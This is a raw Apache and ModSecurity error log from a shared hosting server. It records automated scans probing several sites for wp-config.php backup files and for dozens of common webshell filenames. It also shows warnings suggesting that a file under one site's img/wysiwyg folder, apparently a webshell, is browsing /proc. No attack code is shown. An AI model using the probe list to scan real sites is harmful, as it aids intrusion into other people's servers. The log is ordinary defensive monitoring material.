[Tue May 12 01:48:14.110788 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJqvjue9Sp-pIv_Bb6AWgAAAUc"]
[Tue May 12 01:48:14.110994 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJqvjue9Sp-pIv_Bb6AWgAAAUc"]
[Tue May 12 01:48:15.989147 2026] [security2:error] [pid 1691274:tid 1691284] [client 81.167.26.57:18276] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/\\"%s/\\""] [unique_id "agJqv1fdQaraX_prmqcQAAAAAAc"]
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704258/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704258/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704258/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704258/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704258/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704258/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:48:23.172283 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJqxzue9Sp-pIv_Bb6AmwAAAUc"]
[Tue May 12 01:48:23.172445 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJqxzue9Sp-pIv_Bb6AmwAAAUc"]
[Tue May 12 01:48:23.172681 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJqxzue9Sp-pIv_Bb6AmwAAAUc"]
PHP Warning:  filesize(): stat failed for /proc/207/task/207/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/task/207/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/207/task/207/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/task/207/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/207/task/207/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/207/task/207/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:48:39.661973 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJq1zue9Sp-pIv_Bb6A7QAAAUc"]
[Tue May 12 01:48:39.662128 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJq1zue9Sp-pIv_Bb6A7QAAAUc"]
[Tue May 12 01:48:39.662386 2026] [security2:error] [pid 1730207:tid 1730216] [client 172.212.217.10:63852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJq1zue9Sp-pIv_Bb6A7QAAAUc"]
[Tue May 12 01:48:42.147240 2026] [security2:error] [pid 1709071:tid 1709094] [client 198.235.24.91:54477] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agJq2rvMumyrWMfSu7qbGwAAAMc"]
[Tue May 12 01:49:22.998987 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/moon.php
[Tue May 12 01:49:23.232141 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/a1.php
[Tue May 12 01:49:23.462516 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/ahax.php
[Tue May 12 01:49:23.725376 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/lite.php
[Tue May 12 01:49:23.967446 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/k.php
[Tue May 12 01:49:24.236983 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/leaf.php
[Tue May 12 01:49:24.468660 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp-conflg.php
[Tue May 12 01:49:24.700080 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp_filemanager.php
[Tue May 12 01:49:24.969576 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/pp.php
[Tue May 12 01:49:25.205504 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/index26.php
[Tue May 12 01:49:25.471522 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/12.php
[Tue May 12 01:49:25.705731 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/Marvins.php
[Tue May 12 01:49:25.964998 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/wp-config.php.backup"] [unique_id "agJrBbvMumyrWMfSu7qbRAAAANg"]
[Tue May 12 01:49:25.965134 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/wp-config.php.backup"] [unique_id "agJrBbvMumyrWMfSu7qbRAAAANg"]
[Tue May 12 01:49:25.965364 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/wp-config.php.backup"] [unique_id "agJrBbvMumyrWMfSu7qbRAAAANg"]
[Tue May 12 01:49:26.204724 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/aa.php
[Tue May 12 01:49:26.443841 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/abcd.php
[Tue May 12 01:49:27.314140 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/a2.php
[Tue May 12 01:49:27.543831 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp-gr.php
[Tue May 12 01:49:27.786082 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/xynz1.php
[Tue May 12 01:49:28.683760 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/uqcxit7i.php
[Tue May 12 01:49:29.108971 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/display_info.php
[Tue May 12 01:49:29.370730 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp-config-disabled.php
[Tue May 12 01:49:30.573101 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/test_info.php
[Tue May 12 01:49:31.798214 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/spip.php
[Tue May 12 01:49:32.053133 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp-index.php
[Tue May 12 01:49:32.293250 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/php-nginx.php
[Tue May 12 01:49:32.539172 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/wp-config.test.php
[Tue May 12 01:49:32.768968 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/op.php
[Tue May 12 01:49:33.327072 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/mandrill.php
[Tue May 12 01:49:33.587530 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/backup.wp-config.php"] [unique_id "agJrDbvMumyrWMfSu7qbVgAAANg"]
[Tue May 12 01:49:33.587678 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/backup.wp-config.php"] [unique_id "agJrDbvMumyrWMfSu7qbVgAAANg"]
[Tue May 12 01:49:33.587896 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/backup.wp-config.php"] [unique_id "agJrDbvMumyrWMfSu7qbVgAAANg"]
[Tue May 12 01:49:33.830495 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/20.php
[Tue May 12 01:49:34.467147 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/upload_file.php
[Tue May 12 01:49:34.716119 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/aws.settings.php
[Tue May 12 01:49:35.008117 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/payout.php
[Tue May 12 01:49:36.711334 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/pqr.php
[Tue May 12 01:49:36.992120 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/phpinfo.php
[Tue May 12 01:49:37.248755 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/tmp.php
[Tue May 12 01:49:37.480277 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/456.php
[Tue May 12 01:49:37.763351 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/new2.php
[Tue May 12 01:49:38.013865 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/server.php
[Tue May 12 01:49:38.262765 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/extension-info.php
[Tue May 12 01:49:38.531141 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/conn_test.php
[Tue May 12 01:49:38.786110 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/information.php
[Tue May 12 01:49:39.074165 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/credentials.php
[Tue May 12 01:49:39.230495 2026] [security2:error] [pid 1691274:tid 1691284] [client 43.134.71.232:44304] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJrE1fdQaraX_prmqcQdQAAAAc"]
[Tue May 12 01:49:39.333754 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/phphph.php
[Tue May 12 01:49:39.578723 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/test-cgi.php
[Tue May 12 01:49:39.844574 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/twin.php
[Tue May 12 01:49:41.727023 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/pi.php7
[Tue May 12 01:49:42.726062 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/display_phpinfo.php
[Tue May 12 01:49:44.982357 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/webserver-info.php
[Tue May 12 01:49:45.213459 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/new-wp-config.php"] [unique_id "agJrGbvMumyrWMfSu7qbeAAAANg"]
[Tue May 12 01:49:45.213604 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/new-wp-config.php"] [unique_id "agJrGbvMumyrWMfSu7qbeAAAANg"]
[Tue May 12 01:49:45.213830 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/new-wp-config.php"] [unique_id "agJrGbvMumyrWMfSu7qbeAAAANg"]
[Tue May 12 01:49:45.467431 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/env-info.php
[Tue May 12 01:49:45.728347 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/moderator.php
[Tue May 12 01:49:46.672498 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/23.php
[Tue May 12 01:49:46.906966 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/summary.php
[Tue May 12 01:49:47.141518 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/globals.php
[Tue May 12 01:49:47.391655 2026] [:error] [pid 1709071:tid 1709111] [client 172.212.217.10:38505] File does not exist: /home/piregwan/public_html/evil.php
[Tue May 12 01:49:50.295282 2026] [security2:error] [pid 1730175:tid 1730187] [client 43.157.98.187:60984] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-changement/feed/"] [unique_id "agJrHno6NvB9WXx5V-5uQQAAAQo"]
[Tue May 12 01:49:51.063461 2026] [security2:error] [pid 1691274:tid 1691296] [client 43.160.225.169:36938] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/contacts-actus-presse/"] [unique_id "agJrH1fdQaraX_prmqcQggAAABQ"]
[Tue May 12 01:49:51.750919 2026] [security2:error] [pid 1707624:tid 1707703] [client 43.153.47.201:41168] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrH7OxS7i6i_mT2NK6fgAAAFU"]
PHP Warning:  filesize(): stat failed for /proc/850/task/850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/850/task/850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/850/task/850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:50:02.559026 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:23736] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: /Base64 found within ARGS:path: //lib64/perl5/vendor_perl/auto/MIME/Base64"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJrKno6NvB9WXx5V-5ubgAAARc"]
